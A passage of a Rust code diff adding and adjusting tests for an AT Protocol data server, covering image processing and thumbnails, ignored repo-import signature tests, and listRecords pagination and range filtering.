let img = DynamicImage::new_rgb8(width, height);
|
||||
let mut buf = Vec::new();
|
||||
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Gif).unwrap();
|
||||
buf
|
||||
}
|
||||
|
||||
fn create_test_webp(width: u32, height: u32) -> Vec<u8> {
|
||||
let img = DynamicImage::new_rgb8(width, height);
|
||||
let mut buf = Vec::new();
|
||||
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::WebP).unwrap();
|
||||
buf
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_process_png() {
|
||||
let processor = ImageProcessor::new();
|
||||
let data = create_test_png(500, 500);
|
||||
let result = processor.process(&data, "image/png").unwrap();
|
||||
assert_eq!(result.original.width, 500);
|
||||
assert_eq!(result.original.height, 500);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_process_jpeg() {
|
||||
let processor = ImageProcessor::new();
|
||||
let data = create_test_jpeg(400, 300);
|
||||
let result = processor.process(&data, "image/jpeg").unwrap();
|
||||
assert_eq!(result.original.width, 400);
|
||||
assert_eq!(result.original.height, 300);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_process_gif() {
|
||||
let processor = ImageProcessor::new();
|
||||
let data = create_test_gif(200, 200);
|
||||
let result = processor.process(&data, "image/gif").unwrap();
|
||||
assert_eq!(result.original.width, 200);
|
||||
assert_eq!(result.original.height, 200);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_process_webp() {
|
||||
let processor = ImageProcessor::new();
|
||||
let data = create_test_webp(300, 200);
|
||||
let result = processor.process(&data, "image/webp").unwrap();
|
||||
assert_eq!(result.original.width, 300);
|
||||
assert_eq!(result.original.height, 200);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_thumbnail_feed_size() {
|
||||
let processor = ImageProcessor::new();
|
||||
let data = create_test_png(800, 600);
|
||||
let result = processor.process(&data, "image/png").unwrap();
|
||||
|
||||
let thumb = result.thumbnail_feed.expect("Should generate feed thumbnail for large image");
|
||||
assert!(thumb.width <= THUMB_SIZE_FEED);
|
||||
assert!(thumb.height <= THUMB_SIZE_FEED);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_thumbnail_full_size() {
|
||||
let processor = ImageProcessor::new();
|
||||
let data = create_test_png(2000, 1500);
|
||||
let result = processor.process(&data, "image/png").unwrap();
|
||||
|
||||
let thumb = result.thumbnail_full.expect("Should generate full thumbnail for large image");
|
||||
assert!(thumb.width <= THUMB_SIZE_FULL);
|
||||
assert!(thumb.height <= THUMB_SIZE_FULL);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_no_thumbnail_small_image() {
|
||||
let processor = ImageProcessor::new();
|
||||
let data = create_test_png(100, 100);
|
||||
let result = processor.process(&data, "image/png").unwrap();
|
||||
|
||||
assert!(result.thumbnail_feed.is_none(), "Small image should not get feed thumbnail");
|
||||
assert!(result.thumbnail_full.is_none(), "Small image should not get full thumbnail");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_webp_conversion() {
|
||||
let processor = ImageProcessor::new().with_output_format(OutputFormat::WebP);
|
||||
let data = create_test_png(300, 300);
|
||||
let result = processor.process(&data, "image/png").unwrap();
|
||||
|
||||
assert_eq!(result.original.mime_type, "image/webp");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_jpeg_output_format() {
|
||||
let processor = ImageProcessor::new().with_output_format(OutputFormat::Jpeg);
|
||||
let data = create_test_png(300, 300);
|
||||
let result = processor.process(&data, "image/png").unwrap();
|
||||
|
||||
assert_eq!(result.original.mime_type, "image/jpeg");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_png_output_format() {
|
||||
let processor = ImageProcessor::new().with_output_format(OutputFormat::Png);
|
||||
let data = create_test_jpeg(300, 300);
|
||||
let result = processor.process(&data, "image/jpeg").unwrap();
|
||||
|
||||
assert_eq!(result.original.mime_type, "image/png");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_max_dimension_enforced() {
|
||||
let processor = ImageProcessor::new().with_max_dimension(1000);
|
||||
let data = create_test_png(2000, 2000);
|
||||
let result = processor.process(&data, "image/png");
|
||||
|
||||
assert!(matches!(result, Err(ImageError::TooLarge { .. })));
|
||||
if let Err(ImageError::TooLarge { width, height, max_dimension }) = result {
|
||||
assert_eq!(width, 2000);
|
||||
assert_eq!(height, 2000);
|
||||
assert_eq!(max_dimension, 1000);
|
||||
}
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_file_size_limit() {
|
||||
let processor = ImageProcessor::new().with_max_file_size(100);
|
||||
let data = create_test_png(500, 500);
|
||||
let result = processor.process(&data, "image/png");
|
||||
|
||||
assert!(matches!(result, Err(ImageError::FileTooLarge { .. })));
|
||||
if let Err(ImageError::FileTooLarge { size, max_size }) = result {
|
||||
assert!(size > 100);
|
||||
assert_eq!(max_size, 100);
|
||||
}
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_default_max_file_size() {
|
||||
assert_eq!(DEFAULT_MAX_FILE_SIZE, 10 * 1024 * 1024);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_unsupported_format_rejected() {
|
||||
let processor = ImageProcessor::new();
|
||||
let data = b"this is not an image";
|
||||
let result = processor.process(data, "application/octet-stream");
|
||||
|
||||
assert!(matches!(result, Err(ImageError::UnsupportedFormat(_))));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_corrupted_image_handling() {
|
||||
let processor = ImageProcessor::new();
|
||||
let data = b"\x89PNG\r\n\x1a\ncorrupted data here";
|
||||
let result = processor.process(data, "image/png");
|
||||
|
||||
assert!(matches!(result, Err(ImageError::DecodeError(_))));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_aspect_ratio_preserved_landscape() {
|
||||
let processor = ImageProcessor::new();
|
||||
let data = create_test_png(1600, 800);
|
||||
let result = processor.process(&data, "image/png").unwrap();
|
||||
|
||||
let thumb = result.thumbnail_full.expect("Should have thumbnail");
|
||||
let original_ratio = 1600.0 / 800.0;
|
||||
let thumb_ratio = thumb.width as f64 / thumb.height as f64;
|
||||
assert!((original_ratio - thumb_ratio).abs() < 0.1, "Aspect ratio should be preserved");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_aspect_ratio_preserved_portrait() {
|
||||
let processor = ImageProcessor::new();
|
||||
let data = create_test_png(800, 1600);
|
||||
let result = processor.process(&data, "image/png").unwrap();
|
||||
|
||||
let thumb = result.thumbnail_full.expect("Should have thumbnail");
|
||||
let original_ratio = 800.0 / 1600.0;
|
||||
let thumb_ratio = thumb.width as f64 / thumb.height as f64;
|
||||
assert!((original_ratio - thumb_ratio).abs() < 0.1, "Aspect ratio should be preserved");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_mime_type_detection_auto() {
|
||||
let processor = ImageProcessor::new();
|
||||
let data = create_test_png(100, 100);
|
||||
let result = processor.process(&data, "application/octet-stream");
|
||||
|
||||
assert!(result.is_ok(), "Should detect PNG format from data");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_is_supported_mime_type() {
|
||||
assert!(ImageProcessor::is_supported_mime_type("image/jpeg"));
|
||||
assert!(ImageProcessor::is_supported_mime_type("image/jpg"));
|
||||
assert!(ImageProcessor::is_supported_mime_type("image/png"));
|
||||
assert!(ImageProcessor::is_supported_mime_type("image/gif"));
|
||||
assert!(ImageProcessor::is_supported_mime_type("image/webp"));
|
||||
assert!(ImageProcessor::is_supported_mime_type("IMAGE/PNG"));
|
||||
assert!(ImageProcessor::is_supported_mime_type("Image/Jpeg"));
|
||||
|
||||
assert!(!ImageProcessor::is_supported_mime_type("image/bmp"));
|
||||
assert!(!ImageProcessor::is_supported_mime_type("image/tiff"));
|
||||
assert!(!ImageProcessor::is_supported_mime_type("text/plain"));
|
||||
assert!(!ImageProcessor::is_supported_mime_type("application/json"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_strip_exif() {
|
||||
let data = create_test_jpeg(100, 100);
|
||||
let result = ImageProcessor::strip_exif(&data);
|
||||
assert!(result.is_ok());
|
||||
let stripped = result.unwrap();
|
||||
assert!(!stripped.is_empty());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_with_thumbnails_disabled() {
|
||||
let processor = ImageProcessor::new().with_thumbnails(false);
|
||||
let data = create_test_png(2000, 2000);
|
||||
let result = processor.process(&data, "image/png").unwrap();
|
||||
|
||||
assert!(result.thumbnail_feed.is_none(), "Thumbnails should be disabled");
|
||||
assert!(result.thumbnail_full.is_none(), "Thumbnails should be disabled");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_builder_chaining() {
|
||||
let processor = ImageProcessor::new()
|
||||
.with_max_dimension(2048)
|
||||
.with_max_file_size(5 * 1024 * 1024)
|
||||
.with_output_format(OutputFormat::Jpeg)
|
||||
.with_thumbnails(true);
|
||||
|
||||
let data = create_test_png(500, 500);
|
||||
let result = processor.process(&data, "image/png").unwrap();
|
||||
assert_eq!(result.original.mime_type, "image/jpeg");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_processed_image_fields() {
|
||||
let processor = ImageProcessor::new();
|
||||
let data = create_test_png(500, 500);
|
||||
let result = processor.process(&data, "image/png").unwrap();
|
||||
|
||||
assert!(!result.original.data.is_empty());
|
||||
assert!(!result.original.mime_type.is_empty());
|
||||
assert!(result.original.width > 0);
|
||||
assert!(result.original.height > 0);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_only_feed_thumbnail_for_medium_images() {
|
||||
let processor = ImageProcessor::new();
|
||||
let data = create_test_png(500, 500);
|
||||
let result = processor.process(&data, "image/png").unwrap();
|
||||
|
||||
assert!(result.thumbnail_feed.is_some(), "Should have feed thumbnail");
|
||||
assert!(result.thumbnail_full.is_none(), "Should NOT have full thumbnail for 500px image");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_both_thumbnails_for_large_images() {
|
||||
let processor = ImageProcessor::new();
|
||||
let data = create_test_png(2000, 2000);
|
||||
let result = processor.process(&data, "image/png").unwrap();
|
||||
|
||||
assert!(result.thumbnail_feed.is_some(), "Should have feed thumbnail");
|
||||
assert!(result.thumbnail_full.is_some(), "Should have full thumbnail for 2000px image");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_exact_threshold_boundary_feed() {
|
||||
let processor = ImageProcessor::new();
|
||||
|
||||
let at_threshold = create_test_png(THUMB_SIZE_FEED, THUMB_SIZE_FEED);
|
||||
let result = processor.process(&at_threshold, "image/png").unwrap();
|
||||
assert!(result.thumbnail_feed.is_none(), "Exact threshold should not generate thumbnail");
|
||||
|
||||
let above_threshold = create_test_png(THUMB_SIZE_FEED + 1, THUMB_SIZE_FEED + 1);
|
||||
let result = processor.process(&above_threshold, "image/png").unwrap();
|
||||
assert!(result.thumbnail_feed.is_some(), "Above threshold should generate thumbnail");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_exact_threshold_boundary_full() {
|
||||
let processor = ImageProcessor::new();
|
||||
|
||||
let at_threshold = create_test_png(THUMB_SIZE_FULL, THUMB_SIZE_FULL);
|
||||
let result = processor.process(&at_threshold, "image/png").unwrap();
|
||||
assert!(result.thumbnail_full.is_none(), "Exact threshold should not generate thumbnail");
|
||||
|
||||
let above_threshold = create_test_png(THUMB_SIZE_FULL + 1, THUMB_SIZE_FULL + 1);
|
||||
let result = processor.process(&above_threshold, "image/png").unwrap();
|
||||
assert!(result.thumbnail_full.is_some(), "Above threshold should generate thumbnail");
|
||||
}
|
||||
@@ -217,6 +217,7 @@ async fn get_user_signing_key(did: &str) -> Option<Vec<u8>> {
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
#[ignore = "requires exclusive env var access; run with: cargo test test_import_with_valid_signature_and_mock_plc -- --ignored --test-threads=1"]
|
||||
async fn test_import_with_valid_signature_and_mock_plc() {
|
||||
let client = client();
|
||||
let (token, did) = create_account_and_login(&client).await;
|
||||
@@ -266,6 +267,7 @@ async fn test_import_with_valid_signature_and_mock_plc() {
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
#[ignore = "requires exclusive env var access; run with: cargo test test_import_with_wrong_signing_key_fails -- --ignored --test-threads=1"]
|
||||
async fn test_import_with_wrong_signing_key_fails() {
|
||||
let client = client();
|
||||
let (token, did) = create_account_and_login(&client).await;
|
||||
@@ -322,6 +324,7 @@ async fn test_import_with_wrong_signing_key_fails() {
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
#[ignore = "requires exclusive env var access; run with: cargo test test_import_with_did_mismatch_fails -- --ignored --test-threads=1"]
|
||||
async fn test_import_with_did_mismatch_fails() {
|
||||
let client = client();
|
||||
let (token, did) = create_account_and_login(&client).await;
|
||||
@@ -373,6 +376,7 @@ async fn test_import_with_did_mismatch_fails() {
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
#[ignore = "requires exclusive env var access; run with: cargo test test_import_with_plc_resolution_failure -- --ignored --test-threads=1"]
|
||||
async fn test_import_with_plc_resolution_failure() {
|
||||
let client = client();
|
||||
let (token, did) = create_account_and_login(&client).await;
|
||||
@@ -424,6 +428,7 @@ async fn test_import_with_plc_resolution_failure() {
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
#[ignore = "requires exclusive env var access; run with: cargo test test_import_with_no_signing_key_in_did_doc -- --ignored --test-threads=1"]
|
||||
async fn test_import_with_no_signing_key_in_did_doc() {
|
||||
let client = client();
|
||||
let (token, did) = create_account_and_login(&client).await;
|
||||
|
||||
554
tests/list_records_pagination.rs
Normal file
554
tests/list_records_pagination.rs
Normal file
@@ -0,0 +1,554 @@
|
||||
mod common;
|
||||
mod helpers;
|
||||
use common::*;
|
||||
use helpers::*;
|
||||
|
||||
use chrono::Utc;
|
||||
use reqwest::StatusCode;
|
||||
use serde_json::{Value, json};
|
||||
use std::time::Duration;
|
||||
|
||||
async fn create_post_with_rkey(
|
||||
client: &reqwest::Client,
|
||||
did: &str,
|
||||
jwt: &str,
|
||||
rkey: &str,
|
||||
text: &str,
|
||||
) -> (String, String) {
|
||||
let payload = json!({
|
||||
"repo": did,
|
||||
"collection": "app.bsky.feed.post",
|
||||
"rkey": rkey,
|
||||
"record": {
|
||||
"$type": "app.bsky.feed.post",
|
||||
"text": text,
|
||||
"createdAt": Utc::now().to_rfc3339()
|
||||
}
|
||||
});
|
||||
|
||||
let res = client
|
||||
.post(format!(
|
||||
"{}/xrpc/com.atproto.repo.putRecord",
|
||||
base_url().await
|
||||
))
|
||||
.bearer_auth(jwt)
|
||||
.json(&payload)
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to create record");
|
||||
|
||||
assert_eq!(res.status(), StatusCode::OK);
|
||||
let body: Value = res.json().await.unwrap();
|
||||
(
|
||||
body["uri"].as_str().unwrap().to_string(),
|
||||
body["cid"].as_str().unwrap().to_string(),
|
||||
)
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_list_records_default_order() {
|
||||
let client = client();
|
||||
let (did, jwt) = setup_new_user("list-default-order").await;
|
||||
|
||||
create_post_with_rkey(&client, &did, &jwt, "aaaa", "First post").await;
|
||||
tokio::time::sleep(Duration::from_millis(50)).await;
|
||||
create_post_with_rkey(&client, &did, &jwt, "bbbb", "Second post").await;
|
||||
tokio::time::sleep(Duration::from_millis(50)).await;
|
||||
create_post_with_rkey(&client, &did, &jwt, "cccc", "Third post").await;
|
||||
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.repo.listRecords",
|
||||
base_url().await
|
||||
))
|
||||
.query(&[
|
||||
("repo", did.as_str()),
|
||||
("collection", "app.bsky.feed.post"),
|
||||
])
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to list records");
|
||||
|
||||
assert_eq!(res.status(), StatusCode::OK);
|
||||
let body: Value = res.json().await.unwrap();
|
||||
let records = body["records"].as_array().unwrap();
|
||||
|
||||
assert_eq!(records.len(), 3);
|
||||
let rkeys: Vec<&str> = records
|
||||
.iter()
|
||||
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
|
||||
.collect();
|
||||
|
||||
assert_eq!(rkeys, vec!["cccc", "bbbb", "aaaa"], "Default order should be DESC (newest first)");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_list_records_reverse_true() {
|
||||
let client = client();
|
||||
let (did, jwt) = setup_new_user("list-reverse").await;
|
||||
|
||||
create_post_with_rkey(&client, &did, &jwt, "aaaa", "First post").await;
|
||||
tokio::time::sleep(Duration::from_millis(50)).await;
|
||||
create_post_with_rkey(&client, &did, &jwt, "bbbb", "Second post").await;
|
||||
tokio::time::sleep(Duration::from_millis(50)).await;
|
||||
create_post_with_rkey(&client, &did, &jwt, "cccc", "Third post").await;
|
||||
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.repo.listRecords",
|
||||
base_url().await
|
||||
))
|
||||
.query(&[
|
||||
("repo", did.as_str()),
|
||||
("collection", "app.bsky.feed.post"),
|
||||
("reverse", "true"),
|
||||
])
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to list records");
|
||||
|
||||
assert_eq!(res.status(), StatusCode::OK);
|
||||
let body: Value = res.json().await.unwrap();
|
||||
let records = body["records"].as_array().unwrap();
|
||||
|
||||
let rkeys: Vec<&str> = records
|
||||
.iter()
|
||||
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
|
||||
.collect();
|
||||
|
||||
assert_eq!(rkeys, vec!["aaaa", "bbbb", "cccc"], "reverse=true should give ASC order (oldest first)");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_list_records_cursor_pagination() {
|
||||
let client = client();
|
||||
let (did, jwt) = setup_new_user("list-cursor").await;
|
||||
|
||||
for i in 0..5 {
|
||||
create_post_with_rkey(&client, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await;
|
||||
tokio::time::sleep(Duration::from_millis(50)).await;
|
||||
}
|
||||
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.repo.listRecords",
|
||||
base_url().await
|
||||
))
|
||||
.query(&[
|
||||
("repo", did.as_str()),
|
||||
("collection", "app.bsky.feed.post"),
|
||||
("limit", "2"),
|
||||
])
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to list records");
|
||||
|
||||
assert_eq!(res.status(), StatusCode::OK);
|
||||
let body: Value = res.json().await.unwrap();
|
||||
let records = body["records"].as_array().unwrap();
|
||||
assert_eq!(records.len(), 2);
|
||||
|
||||
let cursor = body["cursor"].as_str().expect("Should have cursor with more records");
|
||||
|
||||
let res2 = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.repo.listRecords",
|
||||
base_url().await
|
||||
))
|
||||
.query(&[
|
||||
("repo", did.as_str()),
|
||||
("collection", "app.bsky.feed.post"),
|
||||
("limit", "2"),
|
||||
("cursor", cursor),
|
||||
])
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to list records with cursor");
|
||||
|
||||
assert_eq!(res2.status(), StatusCode::OK);
|
||||
let body2: Value = res2.json().await.unwrap();
|
||||
let records2 = body2["records"].as_array().unwrap();
|
||||
assert_eq!(records2.len(), 2);
|
||||
|
||||
let all_uris: Vec<&str> = records
|
||||
.iter()
|
||||
.chain(records2.iter())
|
||||
.map(|r| r["uri"].as_str().unwrap())
|
||||
.collect();
|
||||
let unique_uris: std::collections::HashSet<&str> = all_uris.iter().copied().collect();
|
||||
assert_eq!(all_uris.len(), unique_uris.len(), "Cursor pagination should not repeat records");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_list_records_rkey_start() {
|
||||
let client = client();
|
||||
let (did, jwt) = setup_new_user("list-rkey-start").await;
|
||||
|
||||
create_post_with_rkey(&client, &did, &jwt, "aaaa", "First").await;
|
||||
create_post_with_rkey(&client, &did, &jwt, "bbbb", "Second").await;
|
||||
create_post_with_rkey(&client, &did, &jwt, "cccc", "Third").await;
|
||||
create_post_with_rkey(&client, &did, &jwt, "dddd", "Fourth").await;
|
||||
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.repo.listRecords",
|
||||
base_url().await
|
||||
))
|
||||
.query(&[
|
||||
("repo", did.as_str()),
|
||||
("collection", "app.bsky.feed.post"),
|
||||
("rkeyStart", "bbbb"),
|
||||
("reverse", "true"),
|
||||
])
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to list records");
|
||||
|
||||
assert_eq!(res.status(), StatusCode::OK);
|
||||
let body: Value = res.json().await.unwrap();
|
||||
let records = body["records"].as_array().unwrap();
|
||||
|
||||
let rkeys: Vec<&str> = records
|
||||
.iter()
|
||||
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
|
||||
.collect();
|
||||
|
||||
for rkey in &rkeys {
|
||||
assert!(*rkey >= "bbbb", "rkeyStart should filter records >= start");
|
||||
}
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_list_records_rkey_end() {
|
||||
let client = client();
|
||||
let (did, jwt) = setup_new_user("list-rkey-end").await;
|
||||
|
||||
create_post_with_rkey(&client, &did, &jwt, "aaaa", "First").await;
|
||||
create_post_with_rkey(&client, &did, &jwt, "bbbb", "Second").await;
|
||||
create_post_with_rkey(&client, &did, &jwt, "cccc", "Third").await;
|
||||
create_post_with_rkey(&client, &did, &jwt, "dddd", "Fourth").await;
|
||||
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.repo.listRecords",
|
||||
base_url().await
|
||||
))
|
||||
.query(&[
|
||||
("repo", did.as_str()),
|
||||
("collection", "app.bsky.feed.post"),
|
||||
("rkeyEnd", "cccc"),
|
||||
("reverse", "true"),
|
||||
])
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to list records");
|
||||
|
||||
assert_eq!(res.status(), StatusCode::OK);
|
||||
let body: Value = res.json().await.unwrap();
|
||||
let records = body["records"].as_array().unwrap();
|
||||
|
||||
let rkeys: Vec<&str> = records
|
||||
.iter()
|
||||
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
|
||||
.collect();
|
||||
|
||||
for rkey in &rkeys {
|
||||
assert!(*rkey <= "cccc", "rkeyEnd should filter records <= end");
|
||||
}
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_list_records_rkey_range() {
|
||||
let client = client();
|
||||
let (did, jwt) = setup_new_user("list-rkey-range").await;
|
||||
|
||||
create_post_with_rkey(&client, &did, &jwt, "aaaa", "First").await;
|
||||
create_post_with_rkey(&client, &did, &jwt, "bbbb", "Second").await;
|
||||
create_post_with_rkey(&client, &did, &jwt, "cccc", "Third").await;
|
||||
create_post_with_rkey(&client, &did, &jwt, "dddd", "Fourth").await;
|
||||
create_post_with_rkey(&client, &did, &jwt, "eeee", "Fifth").await;
|
||||
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.repo.listRecords",
|
||||
base_url().await
|
||||
))
|
||||
.query(&[
|
||||
("repo", did.as_str()),
|
||||
("collection", "app.bsky.feed.post"),
|
||||
("rkeyStart", "bbbb"),
|
||||
("rkeyEnd", "dddd"),
|
||||
("reverse", "true"),
|
||||
])
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to list records");
|
||||
|
||||
assert_eq!(res.status(), StatusCode::OK);
|
||||
let body: Value = res.json().await.unwrap();
|
||||
let records = body["records"].as_array().unwrap();
|
||||
|
||||
let rkeys: Vec<&str> = records
|
||||
.iter()
|
||||
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
|
||||
.collect();
|
||||
|
||||
for rkey in &rkeys {
|
||||
assert!(*rkey >= "bbbb" && *rkey <= "dddd", "Range should be inclusive, got {}", rkey);
|
||||
}
|
||||
assert!(!rkeys.is_empty(), "Should have at least some records in range");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_list_records_limit_clamping_max() {
|
||||
let client = client();
|
||||
let (did, jwt) = setup_new_user("list-limit-max").await;
|
||||
|
||||
for i in 0..5 {
|
||||
create_post_with_rkey(&client, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await;
|
||||
}
|
||||
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.repo.listRecords",
|
||||
base_url().await
|
||||
))
|
||||
.query(&[
|
||||
("repo", did.as_str()),
|
||||
("collection", "app.bsky.feed.post"),
|
||||
("limit", "1000"),
|
||||
])
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to list records");
|
||||
|
||||
assert_eq!(res.status(), StatusCode::OK);
|
||||
let body: Value = res.json().await.unwrap();
|
||||
let records = body["records"].as_array().unwrap();
|
||||
assert!(records.len() <= 100, "Limit should be clamped to max 100");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_list_records_limit_clamping_min() {
|
||||
let client = client();
|
||||
let (did, jwt) = setup_new_user("list-limit-min").await;
|
||||
|
||||
create_post_with_rkey(&client, &did, &jwt, "aaaa", "Post").await;
|
||||
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.repo.listRecords",
|
||||
base_url().await
|
||||
))
|
||||
.query(&[
|
||||
("repo", did.as_str()),
|
||||
("collection", "app.bsky.feed.post"),
|
||||
("limit", "0"),
|
||||
])
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to list records");
|
||||
|
||||
assert_eq!(res.status(), StatusCode::OK);
|
||||
let body: Value = res.json().await.unwrap();
|
||||
let records = body["records"].as_array().unwrap();
|
||||
assert!(records.len() >= 1, "Limit should be clamped to min 1");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_list_records_empty_collection() {
|
||||
let client = client();
|
||||
let (did, _jwt) = setup_new_user("list-empty").await;
|
||||
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.repo.listRecords",
|
||||
base_url().await
|
||||
))
|
||||
.query(&[
|
||||
("repo", did.as_str()),
|
||||
("collection", "app.bsky.feed.post"),
|
||||
])
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to list records");
|
||||
|
||||
assert_eq!(res.status(), StatusCode::OK);
|
||||
let body: Value = res.json().await.unwrap();
|
||||
let records = body["records"].as_array().unwrap();
|
||||
assert!(records.is_empty(), "Empty collection should return empty array");
|
||||
assert!(body["cursor"].is_null(), "Empty collection should have no cursor");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_list_records_exact_limit() {
|
||||
let client = client();
|
||||
let (did, jwt) = setup_new_user("list-exact-limit").await;
|
||||
|
||||
for i in 0..10 {
|
||||
create_post_with_rkey(&client, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await;
|
||||
}
|
||||
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.repo.listRecords",
|
||||
base_url().await
|
||||
))
|
||||
.query(&[
|
||||
("repo", did.as_str()),
|
||||
("collection", "app.bsky.feed.post"),
|
||||
("limit", "5"),
|
||||
])
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to list records");
|
||||
|
||||
assert_eq!(res.status(), StatusCode::OK);
|
||||
let body: Value = res.json().await.unwrap();
|
||||
let records = body["records"].as_array().unwrap();
|
||||
assert_eq!(records.len(), 5, "Should return exactly 5 records when limit=5");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_list_records_cursor_exhaustion() {
|
||||
let client = client();
|
||||
let (did, jwt) = setup_new_user("list-cursor-exhaust").await;
|
||||
|
||||
for i in 0..3 {
|
||||
create_post_with_rkey(&client, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await;
|
||||
}
|
||||
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.repo.listRecords",
|
||||
base_url().await
|
||||
))
|
||||
.query(&[
|
||||
("repo", did.as_str()),
|
||||
("collection", "app.bsky.feed.post"),
|
||||
("limit", "10"),
|
||||
])
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to list records");
|
||||
|
||||
assert_eq!(res.status(), StatusCode::OK);
|
||||
let body: Value = res.json().await.unwrap();
|
||||
let records = body["records"].as_array().unwrap();
|
||||
assert_eq!(records.len(), 3);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_list_records_repo_not_found() {
|
||||
let client = client();
|
||||
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.repo.listRecords",
|
||||
base_url().await
|
||||
))
|
||||
.query(&[
|
||||
("repo", "did:plc:nonexistent12345"),
|
||||
("collection", "app.bsky.feed.post"),
|
||||
])
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to list records");
|
||||
|
||||
assert_eq!(res.status(), StatusCode::NOT_FOUND);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_list_records_includes_cid() {
|
||||
let client = client();
|
||||
let (did, jwt) = setup_new_user("list-includes-cid").await;
|
||||
|
||||
create_post_with_rkey(&client, &did, &jwt, "test", "Test post").await;
|
||||
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.repo.listRecords",
|
||||
base_url().await
|
||||
))
|
||||
.query(&[
|
||||
("repo", did.as_str()),
|
||||
("collection", "app.bsky.feed.post"),
|
||||
])
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to list records");
|
||||
|
||||
assert_eq!(res.status(), StatusCode::OK);
|
||||
let body: Value = res.json().await.unwrap();
|
||||
let records = body["records"].as_array().unwrap();
|
||||
|
||||
for record in records {
|
||||
assert!(record["uri"].is_string(), "Record should have uri");
|
||||
assert!(record["cid"].is_string(), "Record should have cid");
|
||||
assert!(record["value"].is_object(), "Record should have value");
|
||||
let cid = record["cid"].as_str().unwrap();
|
||||
assert!(cid.starts_with("bafy"), "CID should be valid");
|
||||
}
